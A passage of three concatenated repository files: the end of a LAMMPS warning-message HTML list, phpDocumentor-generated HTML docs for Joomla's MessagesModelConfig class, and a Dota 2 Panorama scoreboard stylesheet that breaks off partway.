Thus the pressure used by MSST could be inaccurate.
<DT><I>Temperature for NPT is not for group all</I>
<DD>User-assigned temperature to NPT fix does not compute temperature for
all atoms. Since NPT computes a global pressure, the kinetic energy
contribution from the temperature is assumed to also be for all atoms.
Thus the pressure used by NPT could be inaccurate.
<DT><I>Temperature for fix modify is not for group all</I>
<DD>The temperature compute is being used with a pressure calculation
which does operate on group all, so this may be inconsistent.
<DT><I>Temperature for thermo pressure is not for group all</I>
<DD>User-assigned temperature to thermo via the thermo_modify command does
not compute temperature for all atoms. Since thermo computes a global
pressure, the kinetic energy contribution from the temperature is
assumed to also be for all atoms. Thus the pressure printed by thermo
could be inaccurate.
<DT><I>Too many common neighbors in CNA %d times</I>
<DD>More than the maximum # of neighbors was found multiple times. This
was unexpected.
<DT><I>Too many inner timesteps in fix ttm</I>
<DD>Self-explanatory.
<DT><I>Too many neighbors in CNA for %d atoms</I>
<DD>More than the maximum # of neighbors was found multiple times. This
was unexpected.
<DT><I>Use special bonds = 0,1,1 with bond style fene/expand</I>
<DD>Most FENE models need this setting for the special_bonds command.
<DT><I>Use special bonds = 0,1,1 with bond style fene</I>
<DD>Most FENE models need this setting for the special_bonds command.
<DT><I>Using compute temp/deform with inconsistent fix deform remap option</I>
<DD>Fix nvt/sllod assumes deforming atoms have a velocity profile provided
by "remap v" or "remap none" as a fix deform option.
<DT><I>Using compute temp/deform with no fix deform defined</I>
<DD>This is probably an error, since it makes little sense to use
compute temp/deform in this case.
<DT><I>Using pair tail corrections with nonperiodic system</I>
<DD>This is probably a bogus thing to do, since tail corrections are
computed by integrating the density of a periodic system out to
infinity.
</DL>
</HTML>
|
Joomla-Administrator/com_messages/MessagesModelConfig.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs For Class MessagesModelConfig</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<script src="../../media/lib/classTree.js"></script>
<script language="javascript" type="text/javascript">
var imgPlus = new Image();
var imgMinus = new Image();
imgPlus.src = "../../media/images/plus.png";
imgMinus.src = "../../media/images/minus.png";
function showNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgMinus.src;
oTable.style.display = "block";
}
function hideNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgPlus.src;
oTable.style.display = "none";
}
function nodeIsVisible(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
break;
}
return (oTable && oTable.style.display == "block");
}
function toggleNodeVisibility(Node){
if (nodeIsVisible(Node)){
hideNode(Node);
}else{
showNode(Node);
}
}
</script>
</head>
<body>
<div class="page-body">
<h2 class="class-name"><img src="../../media/images/Class_logo.png"
alt=" Class"
title=" Class"
style="vertical-align: middle"> MessagesModelConfig</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
<span class="disabled">Description</span> |
<a href="#sec-vars">Vars</a>
| <a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Message configuration model.</p>
<ul class="tags">
<li><span class="field">since:</span> 1.6</li>
</ul>
<p class="notes">
Located in <a class="field" href="_administrator---components---com_messages---models---config.php.html">/administrator/components/com_messages/models/config.php</a> (line <span class="field"><a href="../../filesource/fsource_Joomla-Administrator_com_messages_administratorcomponentscom_messagesmodelsconfig.php.html#a19">19</a></span>)
</p>
<pre><a href="../../Joomla-Platform/Object/JObject.html">JObject</a>
|
--<a href="../../Joomla-Legacy/Model/JModelLegacy.html">JModelLegacy</a>
|
--<a href="../../Joomla-Legacy/Model/JModelForm.html">JModelForm</a>
|
--MessagesModelConfig</pre>
</div>
</div>
<a name="sec-method-summary"></a>
<div class="info-box">
<div class="info-box-title">Method Summary</span></div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-vars">Vars</a>
|
<span class="disabled">Methods</span> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<div class="method-summary">
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result"><a href="../../Joomla-Platform/Form/JForm.html">JForm</a></span>
<a href="#getForm" title="details" class="method-name">getForm</a>
([<span class="var-type">array</span> <span class="var-name">$data</span> = <span class="var-default">array()</span>], [<span class="var-type">boolean</span> <span class="var-name">$loadData</span> = <span class="var-default">true</span>])
</div>
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result">mixed</span>
<a href="#getItem" title="details" class="method-name">&getItem</a>
(<span class="var-type">integer</span> <span class="var-name">0</span>)
</div>
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result">void</span>
<a href="#populateState" title="details" class="method-name">populateState</a>
()
</div>
<div class="method-definition">
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-result">boolean</span>
<a href="#save" title="details" class="method-name">save</a>
(<span class="var-type">array</span> <span class="var-name">$data</span>)
</div>
</div>
</div>
</div>
<a name="sec-vars"></a>
<div class="info-box">
<div class="info-box-title">Variables</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-var-summary">Vars</a> (<span class="disabled">details</span>)
|
<a href="#sec-method-summary">Methods</a> (<a href="#sec-methods">details</a>)
</div>
<div class="info-box-body">
<h4>Inherited Variables</h4>
<A NAME='inherited_vars'><!-- --></A>
<p>Inherited from <span class="classname"><a href="../../Joomla-Legacy/Model/JModelForm.html">JModelForm</a></span></p>
<blockquote>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#var$_forms">JModelForm::$_forms</a></span><br>
</span>
</blockquote>
<p>Inherited from <span class="classname"><a href="../../Joomla-Legacy/Model/JModelLegacy.html">JModelLegacy</a></span></p>
<blockquote>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$event_clean_cache">JModelLegacy::$event_clean_cache</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$name">JModelLegacy::$name</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$option">JModelLegacy::$option</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$state">JModelLegacy::$state</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$_db">JModelLegacy::$_db</a></span><br>
</span>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#var$__state_set">JModelLegacy::$__state_set</a></span><br>
</span>
</blockquote>
<p>Inherited from <span class="classname"><a href="../../Joomla-Platform/Object/JObject.html">JObject</a></span></p>
<blockquote>
<img src="../../media/images/Variable.png" />
<span class="var-title">
<span class="var-name"><a href="../../Joomla-Platform/Object/JObject.html#var$_errors">JObject::$_errors</a></span><br>
</span>
</blockquote>
</div>
</div>
<a name="sec-methods"></a>
<div class="info-box">
<div class="info-box-title">Methods</div>
<div class="nav-bar">
<a href="#sec-description">Description</a> |
<a href="#sec-vars">Vars</a>
<a href="#sec-method-summary">Methods</a> (<span class="disabled">details</span>)
</div>
<div class="info-box-body">
<A NAME='method_detail'></A>
<a name="methodgetForm" id="getForm"><!-- --></a>
<div class="oddrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">getForm</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Administrator_com_messages_administratorcomponentscom_messagesmodelsconfig.php.html#a86">86</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to get the record form.</p>
<ul class="tags">
<li><span class="field">return:</span> A JForm object on success, false on failure</li>
<li><span class="field">since:</span> 1.6</li>
<li><span class="field">access:</span> public</li>
</ul>
<div class="method-signature">
<span class="method-result"><a href="../../Joomla-Platform/Form/JForm.html">JForm</a></span>
<span class="method-name">
getForm
</span>
([<span class="var-type">array</span> <span class="var-name">$data</span> = <span class="var-default">array()</span>], [<span class="var-type">boolean</span> <span class="var-name">$loadData</span> = <span class="var-default">true</span>])
</div>
<ul class="parameters">
<li>
<span class="var-type">array</span>
<span class="var-name">$data</span><span class="var-description">: Data for the form.</span> </li>
<li>
<span class="var-type">boolean</span>
<span class="var-name">$loadData</span><span class="var-description">: True if the form is to load its own data (default case), false if not.</span> </li>
</ul>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Legacy/Model/JModelForm.html#methodgetForm">JModelForm::getForm()</a></dt>
<dd>Abstract method for getting the form from the model.</dd>
</dl>
</div>
<a name="methodgetItem" id="getItem"><!-- --></a>
<div class="evenrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">getItem</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Administrator_com_messages_administratorcomponentscom_messagesmodelsconfig.php.html#a46">46</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to get a single record.</p>
<ul class="tags">
<li><span class="field">return:</span> Object on success, false on failure.</li>
<li><span class="field">access:</span> public</li>
</ul>
<div class="method-signature">
<span class="method-result">mixed</span>
<span class="method-name">
&getItem
</span>
(<span class="var-type">integer</span> <span class="var-name">0</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">integer</span>
<span class="var-name">0</span><span class="var-description">: The id of the primary key.</span> </li>
</ul>
</div>
<a name="methodpopulateState" id="populateState"><!-- --></a>
<div class="oddrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">populateState</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Administrator_com_messages_administratorcomponentscom_messagesmodelsconfig.php.html#a28">28</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to auto-populate the model state.</p>
<p class="description"><p>Note. Calling getState in this method will result in recursion.</p></p>
<ul class="tags">
<li><span class="field">since:</span> 1.6</li>
<li><span class="field">access:</span> protected</li>
</ul>
<div class="method-signature">
<span class="method-result">void</span>
<span class="method-name">
populateState
</span>
()
</div>
<hr class="separator" />
<div class="notes">Redefinition of:</div>
<dl>
<dt><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodpopulateState">JModelLegacy::populateState()</a></dt>
<dd>Method to auto-populate the model state.</dd>
</dl>
</div>
<a name="methodsave" id="save"><!-- --></a>
<div class="evenrow">
<div class="method-header">
<img src="../../media/images/Method.png" />
<span class="method-title">save</span> (line <span class="line-number"><a href="../../filesource/fsource_Joomla-Administrator_com_messages_administratorcomponentscom_messagesmodelsconfig.php.html#a104">104</a></span>)
</div>
<!-- ========== Info from phpDoc block ========= -->
<p class="short-description">Method to save the form data.</p>
<ul class="tags">
<li><span class="field">return:</span> True on success.</li>
<li><span class="field">access:</span> public</li>
</ul>
<div class="method-signature">
<span class="method-result">boolean</span>
<span class="method-name">
save
</span>
(<span class="var-type">array</span> <span class="var-name">$data</span>)
</div>
<ul class="parameters">
<li>
<span class="var-type">array</span>
<span class="var-name">$data</span><span class="var-description">: The form data.</span> </li>
</ul>
</div>
<h4>Inherited Methods</h4>
<a name='inherited_methods'><!-- --></a>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Legacy/Model/JModelForm.html">JModelForm</a></span></p>
<blockquote>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodcheckin">JModelForm::checkin()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodcheckout">JModelForm::checkout()</a></span><br>
<img src="../../media/images/AbstractMethod.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodgetForm">JModelForm::getForm()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodloadForm">JModelForm::loadForm()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodloadFormData">JModelForm::loadFormData()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodpreprocessData">JModelForm::preprocessData()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodpreprocessForm">JModelForm::preprocessForm()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelForm.html#methodvalidate">JModelForm::validate()</a></span><br>
</blockquote>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Legacy/Model/JModelLegacy.html">JModelLegacy</a></span></p>
<blockquote>
<img src="../../media/images/Constructor.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#method__construct">JModelLegacy::__construct()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodaddIncludePath">JModelLegacy::addIncludePath()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodaddTablePath">JModelLegacy::addTablePath()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodcleanCache">JModelLegacy::cleanCache()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodgetDbo">JModelLegacy::getDbo()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodgetInstance">JModelLegacy::getInstance()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodgetName">JModelLegacy::getName()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodgetState">JModelLegacy::getState()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodgetTable">JModelLegacy::getTable()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodloadHistory">JModelLegacy::loadHistory()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodpopulateState">JModelLegacy::populateState()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodsetDbo">JModelLegacy::setDbo()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#methodsetState">JModelLegacy::setState()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#method_createFileName">JModelLegacy::_createFileName()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#method_createTable">JModelLegacy::_createTable()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#method_getList">JModelLegacy::_getList()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Legacy/Model/JModelLegacy.html#method_getListCount">JModelLegacy::_getListCount()</a></span><br>
</blockquote>
<!-- =========== Summary =========== -->
<p>Inherited From <span class="classname"><a href="../../Joomla-Platform/Object/JObject.html">JObject</a></span></p>
<blockquote>
<img src="../../media/images/Constructor.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#method__construct">JObject::__construct()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methoddef">JObject::def()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodget">JObject::get()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodgetError">JObject::getError()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodgetErrors">JObject::getErrors()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodgetProperties">JObject::getProperties()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodset">JObject::set()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodsetError">JObject::setError()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#methodsetProperties">JObject::setProperties()</a></span><br>
<img src="../../media/images/Method.png" alt=" "/>
<span class="method-name"><a href="../../Joomla-Platform/Object/JObject.html#method__toString">JObject::__toString()</a></span><br>
</blockquote>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Tue, 19 Nov 2013 14:56:28 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.3</a>
</p>
</div></body>
</html> |
content/dota_addons/barebones/panorama/styles/custom_game/xhs_flyout_scoreboard.css | RodneyMcKay/x_hero_siege |
.FlyoutScoreboardRoot
{
horizontal-align: left;
vertical-align: top;
margin-top: 90px;
flow-children: down;
transition-property: transform;
transition-duration: 0.10s;
transform: translate3d( -100%, 0, 0px );
background-color: gradient( linear, 100% 0, 0 0, from( #13161aee ), color-stop( 0.4, #13161a ), to( #2b3139 ) );
border-top: 1px solid #3a363a;
border-left: 1px solid #3a363a;
border-bottom: 1px solid #1d2126;
border-right: 1px solid #1d2126;
box-shadow: 0px 0px 12px 0px #000000a5;
padding: 4px 4px 4px 0px;
}
.ScoreCol_DisplayPic DOTAAvatarImage
{
height: 32px;
width: 32px;
vertical-align: middle;
}
.FlyoutScoreboardRoot.flyout_scoreboard_visible
{
transform: translatey( 0px );
}
.Legend
{
flow-children: right;
/* background-color : #444b57cc;
background-color: #333333ee;*/
width: 100%;
}
.LegendPanel
{
margin-top: 1px;
margin-left: 1px;
}
.Legend Label
{
text-shadow: 0 0 3px 2.0 #000;
text-transform: uppercase;
font-size: 16px;
font-weight: bold;
color: #ccc;
padding-top: 8px;
height: 32px;
text-align: center;
}
.ScoreCol_DisplayPic,
.ScoreCol_HeroPic,
.ScoreCol_TeamScore,
#PlayerColorBar
{
margin-right: 6px;
}
#PlayerColorBar
{
align : left center;
height: 100%;
}
.ScoreCol_TeamScore
{
width: 48px;
}
.ScoreCol_DisplayPic
{
flow-children: right;
width: 43px;
}
.ScoreCol_TeamName
{
width: 210px;
z-index: 1001;
}
.ScoreCol_HeroPic
{
width: 54px;
}
.ScoreCol_PlayerDetails
{
width: 140px;
}
.ScoreCol_HeroLevel
{
width: 60px;
}
.ScoreCol_ImbaXP
{
width: 250px;
}
.ScoreCol_Gold
{
width: 70px;
}
.ScoreCol_ImbaImr5v5,
.ScoreCol_ImbaImr10v10,
.ScoreCol_ImbaImr1v1
{
width: 70px;
visibility: collapse;
}
.ScoreCol_Kills,
.ScoreCol_Deaths,
.ScoreCol_Assists
{
width: 30px;
}
.ScoreCol_Ultimate
{
width: 40px;
}
.ScoreCol_Buttons
{
width: 110px;
vertical-align: center;
flow-children: right;
}
.spectator_view .ScoreCol_Buttons
{
width: 25px;
}
#TeamsContainer
{
flow-children: down;
horizontal-align: left;
}
.FlyoutTeamData
{
margin-top: -30px;
flow-children: right;
height: 50px;
padding-left: 10px;
}
.FlyoutPlayer
{
flow-children: right;
}
#PlayersContainer
{
flow-children: down;
padding-bottom: 30px;
}
#TeamScore,
#TeamName
{
color: #ccc;
font-size: 18px;
padding: 5px 0px;
text-transform: uppercase;
font-weight: bold;
text-shadow: 0 0 3px 2.0 #000;
letter-spacing: 2px;
}
#TeamScore,
{
color: #eee;
horizontal-align: center;
}
.PlayerRow
{
box-shadow: 0px 0px 10px 0px #000000a5 inset;
border: 1px solid #222222a5;
height: 36px;
margin-bottom: 2px;
background-color: #21272fbb;
}
.is_local_player #PlayerRowContainer
{
background-color: gradient( linear, 100% 0, 0 0, from( #13161a ), color-stop( 0.4, #13161a ), to( #2b3139ee ) );
}
#PlayerRowContainer
{
flow-children: right;
height: 100%;
}
#PlayerColorBar
{
width: 5px;
height: 100%;
}
#HeroIcon
{
vertical-align: middle;
border: 1px solid #ffffff22;
}
#LevelContainer,
#KillsContainer,
#DeathsContainer,
#AssistsContainer
{
height: 100%;
}
.ScoreboardPanel
{
height : 100%;
margin-top: 1px;
margin-left: 1px;
}
.ScoreboardPanel Label
{
font-size: 30px;
text-align: center;
horizontal-align: center;
}
.UltimateIndicatorShared
{
margin-top: 4px;
height: 30px;
background-size: 20px;
background-repeat: no-repeat;
background-position: 50% 50%;
}
#Level
{
vertical-align: center;
horizontal-align: center;
color: #acacac;
text-shadow: 0 0 5px 2.0 #000;
font-weight: bold;
font-size: 22px;
}
#Kills,
#Deaths,
#Assists
{
vertical-align: center;
font-size: 18px;
margin-top: 3px;
width: 100%;
color: #acacac;
text-shadow: 0 0 5px 2.0 #000;
}
#ImbaXPRank0,
#ImbaXPRank1,
#ImbaXPRank2,
#ImbaXPRank3,
#ImbaXPRank4,
#ImbaXPRank5,
#ImbaXPRank6,
#ImbaXPRank7,
#ImbaXPRank8,
#ImbaXPRank9,
#ImbaXPRank10,
#ImbaXPRank11,
#ImbaXPRank12,
#ImbaXPRank13,
#ImbaXPRank14,
#ImbaXPRank15,
#ImbaXPRank16,
#ImbaXPRank17,
#ImbaXPRank18,
#ImbaXPRank19,
#ImbaXPRank20,
#ImbaXPRank21,
#ImbaXPRank22,
#ImbaXPRank23
{
margin-right: 5%;
margin-bottom: 1px;
font-size: 16px;
font-weight: bold;
color: white;
text-shadow: 0 0 3px #000000cc;
align: center center;
}
#ImbaXP0,
#ImbaXP1,
#ImbaXP2,
#ImbaXP3,
#ImbaXP4,
#ImbaXP5,
#ImbaXP6,
#ImbaXP7,
#ImbaXP8,
#ImbaXP9,
#ImbaXP10,
#ImbaXP11,
#ImbaXP12,
#ImbaXP13,
#ImbaXP14,
#ImbaXP15,
#ImbaXP16,
#ImbaXP17,
#ImbaXP18,
#ImbaXP19,
#ImbaXP20,
#ImbaXP21,
#ImbaXP22,
#ImbaXP23
{
margin-top: 2px;
margin-right: 5px;
font-size: 16px;
font-weight: bold;
color: white;
align: right center;
opacity: 0.75;
}
#ImbaXPEarned0,
#ImbaXPEarned1,
#ImbaXPEarned2,
#ImbaXPEarned3,
#ImbaXPEarned4,
#ImbaXPEarned5,
#ImbaXPEarned6,
#ImbaXPEarned7,
#ImbaXPEarned8,
#ImbaXPEarned9,
#ImbaXPEarned10,
#ImbaXPEarned11,
#ImbaXPEarned12,
#ImbaXPEarned13,
#ImbaXPEarned14,
#ImbaXPEarned15,
#ImbaXPEarned16,
#ImbaXPEarned17,
#ImbaXPEarned18,
#ImbaXPEarned19,
#ImbaXPEarned20,
#ImbaXPEarned21,
#ImbaXPEarned22,
#ImbaXPEarned23
{
visibility: collapse;
}
#ImbaLvl0,
#ImbaLvl1,
#ImbaLvl2,
#ImbaLvl3,
#ImbaLvl4,
#ImbaLvl5,
#ImbaLvl6,
#ImbaLvl7,
#ImbaLvl8,
#ImbaLvl9,
#ImbaLvl10,
#ImbaLvl11,
#ImbaLvl12,
#ImbaLvl13,
#ImbaLvl14,
#ImbaLvl15,
#ImbaLvl16,
#ImbaLvl17,
#ImbaLvl18,
#ImbaLvl19,
#ImbaLvl20,
#ImbaLvl21,
#ImbaLvl22,
#ImbaLvl23
{
font-size: 16px;
font-weight: bold;
margin-top: 2px;
margin-left: 3%;
color: white;
align: left center;
opacity: 0.75;
}
#PlayerAndHeroName
{
padding-top: 1px;
padding-bottom: 1px;
}
#PlayerName
{
color: white;
font-size: 14px;
margin-top: 0px;
white-space: nowrap;
}
#HeroNameAndDescription
{
color: #eee;
font-size: 13px;
}
#TeammateGoldAmount
{
margin-bottom: -2px;
vertical-align: middle;
horizontal-align: center;
font-size: 18px;
font-weight: bold;
color: #ffcc33;
text-shadow: 0 0 5px 2.0 #000;
visibility: collapse;
}
#TeammateIMRAmount
{
margin-bottom: -2px;
vertical-align: middle;
horizontal-align: center;
font-size: 18px;
font-weight: bold;
color: green;
}
#TeammateIMR10v10Amount
{
margin-bottom: -2px;
vertical-align: middle;
horizontal-align: center;
font-size: 18px;
font-weight: bold;
color: green;
}
.is_local_player .ScoreCol_Buttons Button
{
visibility: collapse;
}
.ScoreCol_Buttons Button
{
width: 20px;
height: 20px;
margin-right: 5px;
background-repeat: no-repeat;
background-position: 50% 50%;
background-size: contain;
vertical-align: middle;
}
#BtnMuteVoice
{
background-image: url("file://{images}/custom_game/mute_voice_off.png");
}
#BtnShareUnit
{
background-image: url("file://{images}/custom_game/share_unit_off.png");
visibility: collapse;
}
#BtnShareHero
{
background-image: url("file://{images}/custom_game/share_hero_off.png");
visibility: collapse;
}
#BtnDisableHelp
{
background-image: url("file://{images}/custom_game/disable_help_off.png");
visibility: collapse;
}
.local_player_teammate #BtnShareUnit,
.local_player_teammate #BtnShareHero,
.local_player_teammate #BtnDisableHelp,
{
visibility: visible;
}
#BtnMuteVoice.Activated
{
background-image: url("file://{images}/custom_game/mute_voice_on.png");
}
#BtnShareUnit.Activated
{
background-image: url("file://{images}/custom_game/share_unit_on.png");
}
#BtnShareHero.Activated
{
background-image: url("file://{images}/custom_game/share_hero_on.png");
}
#BtnDisableHelp.Activated
{
background-image: url("file://{images}/custom_game/disable_help_on.png");
}
.local_player_team #TeammateGoldAmount,
.spectator_view #TeammateGoldAmount
{
visibility: visible;
}
#PlayerDetailsContainer
{
height: 100%;
}
#PlayerAndHeroName
{
flow-children: down;
padding-left: 8px;
}
.is_local_player #Kills,
.is_local_player #Deaths,
.is_local_player #Assists,
.is_local_player #Level,
.is_local_player #HeroName
{
text-shadow: 0 0 5px 2.0 #000;
color: white;
}
#XPProgressBar0,
#XPProgressBar1,
#XPProgressBar2,
#XPProgressBar3,
#XPProgressBar4,
#XPProgressBar5,
#XPProgressBar6,
#XPProgressBar7,
#XPProgressBar8,
#XPProgressBar9,
#XPProgressBar10,
#XPProgressBar11,
#XPProgressBar12,
#XPProgressBar13,
#XPProgressBar14,
#XPProgressBar15,
#XPProgressBar16,
#XPProgressBar17,
#XPProgressBar18,
#XPProgressBar19,
#XPProgressBar20,
#XPProgressBar21,
#XPProgressBar22,
#XPProgressBar23
{
width: 100%;
background-color: black;
height: 24px;
vertical-align: middle;
horizontal-align: right;
box-shadow: 0 0 5px 0 #00000022 inset;
flow-children: right;
}
#XPProgressBar0_Left,
#XPProgressBar1_Left,
#XPProgressBar2_Left,
#XPProgressBar3_Left,
#XPProgressBar4_Left,
#XPProgressBar5_Left,
#XPProgressBar6_Left,
#XPProgressBar7_Left,
#XPProgressBar8_Left,
#XPProgressBar9_Left,
#XPProgressBar10_Left,
#XPProgressBar11_Left,
#XPProgressBar12_Left,
#XPProgressBar13_Left,
#XPProgressBar14_Left,
#XPProgressBar15_Left,
#XPProgressBar16_Left,
#XPProgressBar17_Left,
#XPProgressBar18_Left,
#XPProgressBar19_Left,
#XPProgressBar20_Left,
#XPProgressBar21_Left,
#XPProgressBar22_Left,
#XPProgressBar23_Left
{
background-color: gradient( linear, 0% 0%, 0% 100%, from( #006E2E ), to( #00540E ) );
border-radius: 1px;
}
#XPProgressBar0_Right,
#XPProgressBar1_Right,
#XPProgressBar2_Right,
#XPProgressBar3_Right,
#XPProgressBar4_Right,
#XPProgressBar5_Right,
#XPProgressBar6_Right,
#XPProgressBar7_Right,
#XPProgressBar8_Right,
#XPProgressBar9_Right,
